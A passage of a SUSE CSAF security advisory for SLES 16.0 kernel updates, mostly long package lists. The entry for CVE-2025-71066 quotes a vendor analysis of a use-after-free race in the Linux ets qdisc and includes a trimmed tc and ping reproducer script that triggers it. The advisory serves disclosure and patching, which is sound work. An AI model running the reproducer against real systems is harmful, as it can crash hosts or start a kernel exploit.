"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
